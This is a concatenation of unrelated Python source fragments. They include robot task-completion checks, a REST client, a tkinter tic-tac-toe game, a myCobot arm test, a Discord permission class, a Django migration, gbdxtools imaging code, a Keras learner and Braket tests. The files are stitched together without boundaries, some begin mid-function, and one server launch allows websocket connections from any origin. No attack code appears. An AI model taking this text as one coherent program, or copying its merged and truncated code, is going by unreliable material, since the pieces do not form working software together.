self.env.episode_start_time) > self.env.episode_max_time: self.env.episode_info = "Episode maximum time {} s exceeded".format(self.env.episode_max_time) return True return False def check_object_moved(self, object, threshold=0.3): """ Check if object moved more than allowed threshold Parameters: :param object: (object) Object to check :param threshold: (float) Maximum allowed object 
movement Returns: :return: (bool) """ if self.reward_type != "2dvu": object_position = object.get_position() pos_diff = np.array(object_position[:2]) - np.array(object.init_position[:2]) distance = np.linalg.norm(pos_diff) if distance > threshold: self.env.episode_info = "The object has moved {:.2f} m, limit is {:.2f}".format(distance, threshold) return True return False def check_switch_threshold(self): self.angle = self.env.reward.get_angle() if abs(self.angle) >= 18: return True else: return False def check_press_threshold(self): self.pressed = self.env.reward.get_position() if self.pressed >= 1.71: return True else: return False def check_turn_threshold(self): self.turned = self.env.reward.get_angle() if self.turned >= self.desired_angle: return True elif self.turned <= -self.desired_angle: return -1 else: return False # def check_distance_threshold(self, observation): # """ # Check if the distance between relevant task objects is under threshold for successful task completion # # Returns: # :return: (bool) # """ # observation = observation["observation"] if isinstance(observation, dict) else observation # o1 = observation[0:int(len(observation[:-3])/2)] if self.reward_type == "2dvu" else observation[0:3] # o2 = observation[int(len(observation[:-3])/2):-3]if self.reward_type == "2dvu" else observation[3:6] # self.current_norm_distance = self.calc_distance(o1, o2) # return self.current_norm_distance < self.threshold def check_poke_threshold(self, observation): """ Check if the distance between relevant task objects is under threshold for successful task completion Returns: :return: (bool) """ observation = observation["observation"] if isinstance(observation, dict) else observation goal = observation[0:3] poker = observation[3:6] self.current_norm_distance = self.calc_distance(goal, poker) return self.current_norm_distance < 0.1 def check_reach_distance_threshold(self, observation): """ Check if the distance between relevant task objects is under threshold for successful task completion Jonášova verze Returns: :return: (bool) """ observation = observation["observation"] if isinstance(observation, dict) else observation goal = observation[0:3] gripper = self.env.reward.get_accurate_gripper_position(observation[3:6]) self.current_norm_distance = self.calc_distance(goal, gripper) return self.current_norm_distance < self.threshold def check_distance_threshold(self, observation): """ Check if the distance between relevant task objects is under threshold for successful task completion Jonášova verze Returns: :return: (bool) """ observation = observation["observation"] if isinstance(observation, dict) else observation # goal is first in obs and griper is last (always) goal = observation[0:3] gripper = self.env.reward.get_accurate_gripper_position(observation[-3:]) self.current_norm_distance = self.calc_distance(goal, gripper) return self.current_norm_distance < self.threshold def check_distractor_distance_threshold(self, goal, gripper): """ Check if the distance between relevant task objects is under threshold for successful task completion Returns: :return: (bool) """ self.current_norm_distance = self.calc_distance(goal, gripper) threshold = 0.1 return self.current_norm_distance < threshold def check_points_distance_threshold(self): if (self.task_type == 'pnp') and (self.env.robot_action != 'joints_gripper') and (len(self.env.robot.magnetized_objects) == 0): o1 = self.current_task_objects[0] o2 = self.current_task_objects[2] else: o1 = self.current_task_objects[0] o2 = 
self.current_task_objects[1] if o1 == self.env.robot: closest_points = self.env.p.getClosestPoints(o1.get_uid, o2.get_uid(), self.threshold, o1.end_effector_index, -1) elif o2 == self.env.robot: closest_points = self.env.p.getClosestPoints(o2.get_uid(), o1.get_uid(), self.threshold, o2.end_effector_index, -1) else: closest_points = self.env.p.getClosestPoints(o1.get_uid(), o2.get_uid(), self.threshold, -1, -1) if len(closest_points) > 0: return closest_points else: return False def check_goal(self): """ Check if goal of the task was completed successfully """ self.last_distance = self.current_norm_distance if self.init_distance is None: self.init_distance = self.current_norm_distance finished = None if self.task_type == 'reach': finished = self.check_distance_threshold(self._observation) if self.task_type == 'push' or self.task_type == 'throw' or self.task_type == 'pick_n_place': finished = self.check_points_distance_threshold() if self.task_type == 'poke': finished = self.check_poke_threshold(self._observation) if self.task_type == "switch": finished = self.check_switch_threshold() if self.task_type == "press": finished = self.check_press_threshold() if self.task_type == "turn": finished = self.check_turn_threshold() if self.task_type == 'pnp' and self.env.robot_action != 'joints_gripper' and finished: if len(self.env.robot.magnetized_objects) == 0: self.env.episode_over = False self.env.robot.magnetize_object(self.current_task_objects[0], finished) else: self.env.episode_over = True if self.env.episode_steps == 1: self.env.episode_info = "Task completed in initial configuration" else: self.env.episode_info = "Task completed successfully" elif (self.task_type == '2stepreach') and (False in self.subgoals) and finished: self.env.episode_info = "Subgoal {}/{} completed successfully".format(self.sub_idx+1, self.num_subgoals) self.subgoals[self.sub_idx] = True #current subgoal done self.env.episode_over = False #don't reset episode self.env.robot.magnetize_object(self.env.task_objects[self.obs_sub[self.sub_idx][0]], finished) #magnetize first object self.sub_idx += 1 #continue with next subgoal self.env.reward.reset() #reward reset elif finished: self.env.episode_over = True if self.env.episode_steps == 1: self.env.episode_info = "Task completed in initial configuration" else: self.env.episode_info = "Task completed successfully" if self.check_time_exceeded(): self.env.episode_over = True self.env.episode_failed = True if self.env.episode_steps == self.env.max_steps: if self.task_type == "turn": self.env.episode_over = True self.env.episode_failed = True if self.desired_angle == self.desired_angle-int(self.env.reward.get_angle()): self.env.episode_info = "Angle without change" else: self.env.episode_info = f"Remaining angle: {int(self.desired_angle-self.env.reward.get_angle())}" if self.check_turn_threshold() == -1: self.env.episode_over = True self.env.episode_failed = True self.env.episode_info = "Bad direction" else: self.env.episode_over = True self.env.episode_failed = True self.env.episode_info = "Max amount of steps reached" if self.reward_type != 'gt' and (self.check_vision_failure()): self.stored_observation = [] self.env.episode_over = True self.env.episode_failed = True self.env.episode_info = "Vision fails repeatedly" def calc_distance(self, obj1, obj2): """ Calculate distance between two objects Parameters: :param obj1: (float array) First object position representation :param obj2: (float array) Second object position representation Returns: :return dist: (float) Distance between 
2 float arrays """ if self.distance_type == "euclidean": dist = np.linalg.norm(np.asarray(obj1) - np.asarray(obj2)) elif self.distance_type == "manhattan": dist = cityblock(obj1, obj2) return dist def calc_rotation_diff(self, obj1, obj2): """ Calculate diffrence between orientation of two objects Parameters: :param obj1: (float array) First object orientation (Euler angles) :param obj2: (float array) Second object orientation (Euler angles) Returns: :return diff: (float) Distance between 2 float arrays """ if self.distance_type == "euclidean": diff = np.linalg.norm(np.asarray(obj1) - np.asarray(obj2)) elif self.distance_type == "manhattan": diff = cityblock(obj1, obj2) return diff def generate_new_goal(self, object_area_borders, camera_id): """ Generate an image of new goal for VEA vision model. This function is supposed to be called from env workspace. Parameters: :param object_area_borders: (list) Volume in space where task objects can be located :param camera_id: (int) ID of environment camera active for image rendering """ if self.task_type == "push": random_pos = self.env.task_objects[0].get_random_object_position(object_area_borders) random_rot = self.env.task_objects[0].get_random_object_orientation() self.env.robot.reset_up() self.env.task_objects[0].set_position(random_pos) self.env.task_objects[0].set_orientation(random_rot) self.env.task_objects[1].set_position(random_pos) self.env.task_objects[1].set_orientation(random_rot) render_info = self.env.render(mode="rgb_array", camera_id = self.env.active_cameras) self.goal_image = render_info[self.env.active_cameras]["image"] random_pos = self.env.task_objects[0].get_random_object_position(object_area_borders) random_rot = self.env.task_objects[0].get_random_object_orientation() self.env.task_objects[0].set_position(random_pos) self.env.task_objects[0].set_orientation(random_rot) elif self.task_type == "reach": bounded_action = [random.uniform(-3,-2.4) for x in range(2)] action = [random.uniform(-2.9,2.9) for x in range(6)] self.env.robot.reset_joints(bounded_action + action) self.goal_image = self.env.render(mode="rgb_array", camera_id=self.env.active_cameras)[self.env.active_cameras]['image'] self.env.robot.reset_up() #self.goal_image = self.vision_module.vae_generate_sample() <gh_stars>1-10 # + import pandas from aito.client import AitoClient from aito.schema import AitoTableSchema import aito.api as aito_api from aito.utils.data_frame_handler import DataFrameHandler def format_csv_to_json( aito_client, file_path, table_name, schema=None ): """ Format CSV file to JSON """ # If schema is not given expect to get it from Aito if not schema: schema = { "type": "table", "columns": { "GL_Code": { "type": "String", "nullable": False }, "Inv_Amt": { "type": "Decimal", "nullable": False }, "Inv_Id": { "type": "Int", "nullable": False }, "Item_Description": { "type": "Text", "nullable": False, "analyzer": "english" }, "Product_Category": { "type": "String", "nullable": False }, "Vendor_Code": { "type": "String", "nullable": False } } } # Convert the data to be in correct data types by using the schema file_df = pandas.read_csv(file_path) data_frame_handler = DataFrameHandler() converted_file_df = data_frame_handler.convert_df_using_aito_table_schema( df=file_df, table_schema=schema ) # Modify NA values to be None converted_file_df = converted_file_df.where( pandas.notnull(converted_file_df), None) return converted_file_df.to_dict(orient="records") def get_schema(): schema = { "type": "table", "columns": { "GL_Code": { "type": "String", 
"nullable": False }, "Inv_Amt": { "type": "Decimal", "nullable": False }, "Inv_Id": { "type": "Int", "nullable": False }, "Item_Description": { "type": "Text", "nullable": False, "analyzer": "english" }, "Product_Category": { "type": "String", "nullable": False }, "Vendor_Code": { "type": "String", "nullable": False } } } return schema def predict_row(aito_client, data, predict_query): """ Use Aito predict endpoint to predict a result for the given field for a data row. """ # Use other columns than the field to be predicted to define # the where clause of the query where = { "Vendor_Code": data[1], "Inv_Amt": data[2], "Item_Description": data[3], "Product_Category": data[4] } predict_query["where"] = where # Send query to Aito predict endpoint result = aito_api.predict( client=aito_client, query=predict_query ) return { "feature": result["hits"][0]["feature"], "confidence": result["hits"][0]["$p"] } """ Created on Oct 13, 2019 @author: majdukovic """ import requests class RestClient: """ Class for dealing with generic POSTS/UPDATES/GETS/DELETES """ default_timeout = 10 def post(self, url=None, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.post(url, data=data, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response def put(self, url=None, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.put(url, data=data, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response def get(self, url=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.get(url, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response def delete(self, url, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.delete(url, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response def update(self, url, data=None, params=None, hdrs=None, ck=None, basic_auth=None, timeout=None): response = requests.put(url, data=data, params=params, headers=hdrs, cookies=ck, auth=basic_auth, timeout=timeout or self.default_timeout) return response <gh_stars>1-10 from tkinter import * import tkinter.messagebox from ticTacToe import getAIMove,isWinner,isSpaceFree,makeMove b = ['']*10 var = ['']*10 gameBoard = ['']*10 playerLetter='X' #Change later AILetter = 'O' playerColor='red'#Will be able to change later AIColor='blue' playerMove=False startGameCheck = False moves = 0 master=Tk() def makeGUIMove(pos,board,letter): #To make the relevant move and also update the GUI accordingly makeMove(letter,board,pos) if letter is playerLetter: b[pos].config(text=letter,disabledforeground=playerColor) else: b[pos].config(text=letter,disabledforeground=AIColor) b[pos].config(state=DISABLED) #Check if winner as well! pass def checkDraw(): global moves if moves>=9: tkinter.messagebox.showinfo(title='Tic Tac Toe',message="It's a draw!") def makeAIMove(): global moves,playerMove move = getAIMove(gameBoard,AILetter) makeGUIMove(move,gameBoard,AILetter) playerMove=True moves = moves+1 if isWinner(gameBoard,AILetter): tkinter.messagebox.showinfo(title='Tic Tac Toe',message="Oops! 
The AI wins!") else: checkDraw() def onClick(id): global moves if not startGameCheck: startGame() return global playerMove if playerMove and isSpaceFree(id,gameBoard): playerMove=False makeGUIMove(id,gameBoard,playerLetter) moves = moves+1 if isWinner(gameBoard,playerLetter): tkinter.messagebox.showinfo(title='Tic Tac Toe',message="You Win!") else: checkDraw() makeAIMove() #check for winner else: #Do Something maybe pass def restartGame(): global gameBoard,moves,b,var,playerMove,startGameCheck for i in range(1,10): gameBoard[i]=str(i) var[i]=Variable(value=0) b[i].config(text=str(i),state=NORMAL) playerMove=False startGameCheck=False moves=0 startGame() def __init__(): global gameBoard,master #Initial setup of game board for i in range(1,10): gameBoard[i]=str(i) var[i]=Variable(value=0) b[i] = Button(master,text=str(i),font={"arial",10,"bold"},padx=2,pady=2,overrelief=RIDGE,command= lambda id=i:onClick(id)) #b[i].pack(fill=BOTH,expand=1) if i in range(1,4): b[i].grid(row=2,column=i-1,sticky=NSEW) elif i in range(4,7): b[i].grid(row=1,column=i-4,sticky=NSEW) else: b[i].grid(row=0,column=i-7,sticky=NSEW) for i in range(3): Grid.columnconfigure(master,i,weight=1,minsize=80) Grid.rowconfigure(master,i,weight=1,minsize=80) menubar = Menu(master) menubar.add_command(label='Restart Game',command=restartGame) master.config(menu=menubar) master.title("Tic Tac Toe") startGame() #Starting here def startGame(): global moves global playerMove global startGameCheck startGameCheck=True #starts the logical part of the game #We assume right now that the player starts first and is X (RED) moves=0 current = 0 #0 for player, 1 for AI if current==0: playerMove=TRUE else: makeAIMove() playerMove=False #Calls mainloop for GUI setup. Should only be called once __init__() #Inirial setup master.mainloop()from setuptools import setup, find_packages setup( name="config_utils", version="1.0", author="Alex", author_email="<EMAIL>", description="config_utils", long_description="config_utils", packages=find_packages(), include_package_data=True, zip_safe=False )# -*- coding: UTF-8 -*- #!/usr/bin/python3 from pymycobot.mycobot import MyCobot # Variables needed to initialize MyCobotPi from pymycobot import PI_PORT, PI_BAUD import time # Initialize MyCobotPi mc = MyCobot(PI_PORT, PI_BAUD) # Turn on the robot if it's not already powered on if not mc.is_power_on(): # Turn on the robot mc.power_on() # Check whether the six joints are working properly # You can also use is_servo_enable(servo_id) to change a single check if mc.is_all_servo_enable(): # Power off the robotic arm mc.power_off() # Determine whether the robotic arm is powered off if mc.is_all_servo_enable() == -1: print("The power supply of the robotic arm is normal.") else: print("Power failure of the robotic arm.") exit(0) # Power on the robotic arm mc.power_on() # Set the robotic arm to zero position zero_position = [0, 0, 0, 0, 0, 0] speed = 30 # mc.send_angles([0, 0, 0, 0, 0, 0], 30) mc.send_angles(zero_position, speed) # Get the current time start = time.time() # Determine if the robot reaches the desired position # while not mc.is_in_position([0, 0, 0, 0, 0, 0], 0): while not mc.is_in_position(zero_position, 0): # Resume robotic arm movement mc.resume() # Let the arm move for 0.5s time.sleep(0.5) # Pause robotic arm's movement mc.pause() # Determine whether the move has timed out if time.time() - start > 9: # Stop moving the robotic arm print("Arm failed to move to zero position.") # Abort procedure exit(0) # Detect the movement of the six joints for i in 
range(1, 7): # Move the joint point i to the right at a speed of 15 mc.jog_angle(i, 0, 15) # Move the joint point 1.5s time.sleep(1.5) # Stop joint point movement mc.jog_stop() # Move the joint point i to the left at a speed of 15 mc.jog_angle(i, 1, 15) # Move the joint point for 3s time.sleep(3) # Stop joint point movement mc.jog_stop() # Move the joint point i to the right at a speed of 15 mc.jog_angle(i, 0, 15) # Move the joint point for 1.5s time.sleep(1.5) # Stop joint point movement mc.jog_stop() print(str(i) + "No. Joint Point works normally.") # Wait 0.8s time.sleep(0.8) # Get the current time start = time.time() # Set desired position and speed desired_position = [87.27, -139.13, 153.72, -160.92, -74.44, 7.55] speed = 30 # Move the arm to desired position at given speed mc.send_angles(desired_position, speed) # Wait till the arm reaches the desired position and stops # while not mc.is_in_position([87.27, -139.13, 153.72, -160.92, -74.44, 7.55], 0): while not mc.is_in_position(desired_position, 0): # Resume the robotic arm's movement mc.resume() # Let the robotic arm move for 0.5s time.sleep(0.5) # Pause robotic arm movement mc.pause() # Determine whether the move has timed out if time.time() - start > 9: mc.stop() # Stop the robotic arm's movement break # Release all servos for i in range(1, 7): mc.release_servo(i) <reponame>scottyhq/nsidc-0731-panel<gh_stars>0 from subprocess import Popen def load_jupyter_server_extension(nbapp): """serve the notebook panel app with bokeh server""" Popen(["panel", "serve", "measures-panel.ipynb", "--allow-websocket-origin=*"]) <reponame>asleep-cult/snakecord from .basestate import BaseState from .. import http from ..flags import Permissions from ..objects.memberobject import GuildMember from ..objects.overwriteobject import PermissionOverwrite, PermissionOverwriteType from ..objects.roleobject import Role from ..snowflake import Snowflake __all__ = ('PermissionOverwriteState',) class PermissionOverwriteState(BaseState): def __init__(self, *, client, channel): super().__init__(client=client) self.channel = channel @property def everyone(self): return self.get(self.channel.guild_id) def upsert(self, data): overwrite = self.get(Snowflake(data['id'])) if overwrite is not None: overwrite.update(data) else: overwrite = PermissionOverwrite.unmarshal(data, state=self) overwrite.cache() return overwrite async def create(self, obj, *, allow, deny, type=None): json = {} obj_id = Snowflake.try_snowflake(obj) if type is not None: json['type'] = PermissionOverwriteType.try_value(type) elif isinstance(obj, GuildMember): json['type'] = PermissionOverwriteType.MEMBER elif isinstance(obj, Role): json['type'] = PermissionOverwriteType.ROLE json['allow'] = Permissions.try_value(allow) json['deny'] = Permissions.try_value(deny) await http.create_channel_permission_overwrite.request( self.client.http, channel_id=self.channel.id, overwrite_id=obj_id, json=json ) async def delete(self, overwrite): overwrite_id = Snowflake.try_snowflake(overwrite) await http.delete_channel_permission_overwrite.request( self.client.http, channel_id=self.channel.id, overwrite_id=overwrite_id ) def apply_to(self, member): if not isinstance(member, GuildMember): if self.channel.guild is None: return None member = self.channel.guild.members.get(member) if member is None: return None permissions = member.permissions.copy() if permissions.administrator: return permissions if self.everyone is not None: permissions.value |= self.everyone.allow.value permissions.value &= ~self.everyone.deny.value 
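        # The resolution order here follows Discord's channel overwrite model:
        # start from the member's computed guild permissions (administrators
        # short-circuit above), apply the @everyone overwrite, then OR together
        # all role-specific overwrites, and finally apply the member-specific
        # overwrite. Each stage ORs in the allow bits and masks out the deny bits.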
        allow = 0
        deny = 0
        for role_id in member.roles.keys():
            overwrite = self.get(role_id)
            if overwrite is not None:
                allow |= overwrite.allow.value
                deny |= overwrite.deny.value
        permissions.value |= allow
        permissions.value &= ~deny

        overwrite = self.get(member)
        if overwrite is not None:
            permissions.value |= overwrite.allow.value
            permissions.value &= ~overwrite.deny.value

        return permissions
import os
from setuptools import setup, find_packages

current_file_path = os.path.abspath(os.path.dirname(__file__))

readme_file_path = os.path.join(current_file_path, 'README.md')
with open(readme_file_path, 'r') as f:
    readme = f.read()

version_file_path = os.path.join(current_file_path, 'version.py')
with open(version_file_path, 'rb') as f:
    # pylint: disable=exec-used,undefined-variable
    exec(compile(f.read(), version_file_path, 'exec'), globals(), locals())
    version = __version__

packages = find_packages()

setup(
    name='TransBoost',
    version=version,
    author='<NAME> and <NAME>',
    author_email='<EMAIL>',
    download_url='https://github.com/jsleb333/transboost.zip',
    license='MIT',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Intended Audience :: Education',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: MIT',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Topic :: Software Development :: Libraries',
        'Topic :: Software Development :: Libraries :: Python Modules'
    ],
    packages=packages,
    extras_require={'Visualization': ['matplotlib'], 'Traceback Pickling': ['tblib']},
    python_requires='>=3.6',
    description='Multiscale Boosting',
    long_description=readme,
    long_description_content_type='text/markdown',
)
# -*- coding: utf-8 -*-
"""
Model loss, PyTorch implementation
"""
from . import loss
from . import det_loss
# Generated by Django 3.1.8 on 2021-04-27 10:18

from django.db import migrations, models
import django.db.models.deletion
import uuid


class Migration(migrations.Migration):

    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
        ('service', '0005_auto_20210415_1607'),
    ]

    operations = [
        migrations.AlterField(
            model_name='metadatarelation',
            name='relation_type',
            field=models.CharField(blank=True, choices=[(None, '---'), ('visualizes', 'visualizes'), ('describes', 'describes'), ('harvestedThrough', 'harvestedThrough'), ('harvestedParent', 'harvestedParent'), ('publishedBy', 'publishedBy')], max_length=255, null=True),
        ),
        migrations.CreateModel(
            name='MapContext',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False)),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created on')),
                ('last_modified', models.DateTimeField(null=True)),
                ('is_deleted', models.BooleanField(default=False)),
                ('is_active', models.BooleanField(default=False)),
                ('title', models.CharField(max_length=1000)),
                ('abstract', models.TextField()),
                ('update_date', models.DateTimeField(auto_now_add=True)),
                ('layer_tree', models.TextField()),
                ('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='auth.group')),
            ],
            options={
                'abstract': False,
            },
        ),
    ]
<filename>gbdxtools/ipe/interface.py
import os
import sys
import uuid
import json
from hashlib import sha256
from itertools import chain
from collections import OrderedDict
import operator
from functools import partial

import numpy as np

import gbdxtools as gbdx
from gbdxtools.ipe.util import IPE_TO_DTYPE
from gbdxtools.ipe.graph import VIRTUAL_IPE_URL, register_ipe_graph, get_ipe_metadata
from gbdxtools.images.meta import
DaskMeta from gbdxtools.auth import Auth from gbdxtools.ipe.fetch import easyfetch as load_url import warnings warnings.filterwarnings('ignore') try: basestring except NameError: basestring = str try: xrange except NameError: xrange = range NAMESPACE_UUID = uuid.NAMESPACE_DNS class ContentHashedDict(dict): @property def _id(self): _id = str(uuid.uuid5(NAMESPACE_UUID, self.__hash__())) return _id def __hash__(self): dup = OrderedDict({k:v for k,v in self.items() if k is not "id"}) return sha256(str(dup).encode('utf-8')).hexdigest() def populate_id(self): self.update({"id": self._id}) class DaskProps(object): def graph(self): pass @property def metadata(self): assert self.graph() is not None if self._ipe_meta is not None: return self._ipe_meta if self._interface is not None: self._ipe_meta = get_ipe_metadata(self._interface.gbdx_futures_session, self._ipe_id, self._id) return self._ipe_meta @property def dask(self): token = self._interface.gbdx_connection.access_token _chunks = self.chunks _name = self.name img_md = self.metadata["image"] return {(_name, 0, y - img_md['minTileY'], x - img_md['minTileX']): (load_url, url, token, _chunks) for (y, x), url in self._collect_urls().items()} @property def name(self): return "image-{}".format(self._id) @property def chunks(self): img_md = self.metadata["image"] return (img_md["numBands"], img_md["tileYSize"], img_md["tileXSize"]) @property def dtype(self): try: data_type = self.metadata["image"]["dataType"] return IPE_TO_DTYPE[data_type] except KeyError: raise TypeError("Metadata indicates an unrecognized data type: {}".format(data_type)) @property def shape(self): img_md = self.metadata["image"] return (img_md["numBands"], (img_md["maxTileY"] - img_md["minTileY"] + 1)*img_md["tileYSize"], (img_md["maxTileX"] - img_md["minTileX"] + 1)*img_md["tileXSize"]) def _ipe_tile(self, x, y, ipe_id, _id): return "{}/tile/{}/{}/{}/{}/{}.tif".format(VIRTUAL_IPE_URL, "idaho-virtual", ipe_id, _id, x, y) def _collect_urls(self): img_md = self.metadata["image"] ipe_id = self._ipe_id _id = self._id return {(y, x): self._ipe_tile(x, y, ipe_id, _id) for y in xrange(img_md['minTileY'], img_md["maxTileY"]+1) for x in xrange(img_md['minTileX'], img_md["maxTileX"]+1)} class Op(DaskProps, DaskMeta): def __init__(self, name, interface=None): self._operator = name self._edges = [] self._nodes = [] self._ipe_id = None self._ipe_graph = None self._ipe_meta = None self._interface = interface @property def _id(self): return self._nodes[0]._id def __call__(self, *args, **kwargs): if len(args) > 0 and all([isinstance(arg, gbdx.images.ipe_image.IpeImage) for arg in args]): return self._ipe_image_call(*args, **kwargs) self._nodes = [ContentHashedDict({ "operator": self._operator, "_ancestors": [arg._id for arg in args], "parameters": OrderedDict({ k:json.dumps(v, sort_keys=True) if not isinstance(v, basestring) else v for k,v in sorted(kwargs.items(), key=lambda x: x[0])}) })] for arg in args: self._nodes.extend(arg._nodes) self._edges = [ContentHashedDict({"index": idx + 1, "source": arg._nodes[0]._id, "destination": self._nodes[0]._id}) for idx, arg in enumerate(args)] for arg in args: self._edges.extend(arg._edges) for e in chain(self._nodes, self._edges): e.populate_id() return self def _ipe_image_call(self, *args, **kwargs): out = self(*[arg.ipe for arg in args], **kwargs) ipe_img = gbdx.images.ipe_image.IpeImage(out) return ipe_img def graph(self, conn=None): if(self._ipe_id is not None and self._ipe_graph is not None): return self._ipe_graph _nodes = [{k:v for k,v in 
node.items() if not k.startswith('_')} for node in self._nodes] graph = { "edges": self._edges, "nodes": _nodes } if self._interface is not None and conn is None: conn = self._interface.gbdx_futures_session if conn is not None: self._ipe_id = register_ipe_graph(conn, graph) self._ipe_graph = graph self._ipe_meta = get_ipe_metadata(conn, self._ipe_id, self._id) return self._ipe_graph return graph class Ipe(object): def __getattr__(self, name): return Op(name=name, interface=Auth()) <filename>learner.py import time import numpy as np from random import uniform from keras.models import Sequential from keras.layers.core import Dense from keras.optimizers import Adam from MountainCar import MountainCar class Learner(object): def __init__(self, start, goal, Xrange, Vrange, num_actions, max_memory, hidden_size, learning_rate, discount_factor, epsilon): self.env = MountainCar(start, goal, Xrange, Vrange) self.num_actions = num_actions self.max_memory = max_memory self.hidden_size = hidden_size self.learning_rate = learning_rate self.discount_factor = discount_factor self.epsilon = epsilon self.memory = [] self.episodes = [] def build_model(self, input_size=2): model = Sequential() model.add(Dense(self.hidden_size, input_shape=(input_size, ), activation="relu")) if self.hidden_size <= 100: model.add(Dense(self.hidden_size, activation="sigmoid")) model.add(Dense(self.num_actions, activation="linear")) model.compile(Adam(lr=self.learning_rate), "mse") return model def get_initial_state(self): lhand, rhand = self.env.start[0] * 0.8, self.env.start[0] * 1.2 start = round(uniform(lhand, rhand), 2) self.env.state = np.array([start, self.env.start[1]]) # Reset env return self.env.observe() def remember(self, experience): # experience (DoubleQ) -> [[state, action, reward, next_state], game_over] # experience (Sarsa) -> [[state, action, reward], game_over] self.memory.append(experience) if len(self.memory) > self.max_memory: del self.memory[0] @staticmethod def print_time_passed(start_time): time_passed = time.time() - start_time print("Time passed: %.3f seconds.." % time_passed) <filename>Modulo-02/ex050/ex050.py soma = cont = 0 for c in range(1,7): n = int(input(f'digite o {c}° valor: ')) if n % 2 == 0: soma += n cont += 1 print(f'A soma dos {cont} valores pares é {soma}') n = int(input()) l = list(map(int,input().split())) ans = 0 flag = 0 for i in range(1, n): if l[i] < l[i-1]: ans = n-i flag += 1 if (flag == 1 and l[0] >= l[-1]) or flag == 0: print(ans) else: print(-1)# Copyright 2019-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. 
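# A minimal sketch of the bounded replay memory idea used by Learner.remember
# further above; this block is illustrative only (the deque-based variant is an
# assumption about intent, not part of any of the original files):
from collections import deque

replay_memory = deque(maxlen=500)  # oldest experiences are dropped automatically
for step in range(1000):
    # experience layout mirrors the Sarsa case noted in Learner.remember
    replay_memory.append(("state", "action", "reward"))
assert len(replay_memory) == 500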
import numpy as np import pytest from braket.circuits import Observable, QuantumOperator, StandardObservable @pytest.fixture def observable(): return Observable(qubit_count=1, ascii_symbols=["foo"]) @pytest.fixture def standard_observable(): return StandardObservable(qubit_count=1, ascii_symbols=["foo"]) def test_is_operator(observable): assert isinstance(observable, QuantumOperator) @pytest.mark.xfail(raises=ValueError) def test_qubit_count_lt_one(): Observable(qubit_count=0, ascii_symbols=[]) @pytest.mark.xfail(raises=ValueError) def test_none_ascii(): Observable(qubit_count=1, ascii_symbols=None) @pytest.mark.xfail(raises=ValueError) def test_mismatch_length_ascii(): Observable(qubit_count=1, ascii_symbols=["foo", "bar"]) def test_name(observable): expected = observable.__class__.__name__ assert observable.name == expected def test_getters(): qubit_count = 2 ascii_symbols = ("foo", "bar") observable = Observable(qubit_count=qubit_count, ascii_symbols=ascii_symbols) assert observable.qubit_count == qubit_count assert observable.ascii_symbols == ascii_symbols @pytest.mark.xfail(raises=AttributeError) def test_qubit_count_setter(observable): observable.qubit_count = 10 @pytest.mark.xfail(raises=AttributeError) def test_ascii_symbols_setter(observable): observable.ascii_symbols = ["foo", "bar"] @pytest.mark.xfail(raises=AttributeError) def test_name_setter(observable): observable.name = "hi" @pytest.mark.xfail(raises=NotImplementedError) def test_to_ir_not_implemented_by_default(observable): observable.to_ir() @pytest.mark.xfail(raises=NotImplementedError) def test_to_matrix_not_implemented_by_default(observable): observable.to_matrix(None) @pytest.mark.xfail(raises=NotImplementedError) def test_basis_rotation_gates_not_implemented_by_default(observable): observable.basis_rotation_gates @pytest.mark.xfail(raises=NotImplementedError) def test_eigenvalues_not_implemented_by_default(observable): observable.eigenvalues def test_str(observable): expected = "{}('qubit_count': {})".format(observable.name, observable.qubit_count) assert str(observable) == expected def test_register_observable(): class _FooObservable(Observable): def __init__(self): super().__init__(qubit_count=1, ascii_symbols=["foo"]) Observable.register_observable(_FooObservable) assert Observable._FooObservable().name == _FooObservable().name def test_matmul_observable(): o1 = Observable.I() o2 = Observable.Z() o3 = o1 @ o2 assert isinstance(o3, Observable.TensorProduct) assert o3.qubit_count == 2 assert o3.to_ir() == ["i", "z"] assert o3.ascii_symbols == ("I@Z", "I@Z") @pytest.mark.xfail(raises=ValueError) def test_matmul_non_observable(): Observable.I() @ "a" def test_observable_equality(): o1 = Observable.I() o2 = Observable.I() o3 = Observable.Z() o4 = "a" assert o1 == o2 assert o1 != o3 assert o1 != o4 def test_standard_observable_subclass_of_observable(standard_observable): assert isinstance(standard_observable, Observable) def test_standard_observable_eigenvalues(standard_observable): assert np.allclose(standard_observable.eigenvalues, np.array([1, -1])) """This package defines the `picharsso draw` command. Refer to https://kelvindecosta.github.io/picharsso/commands/draw/. 
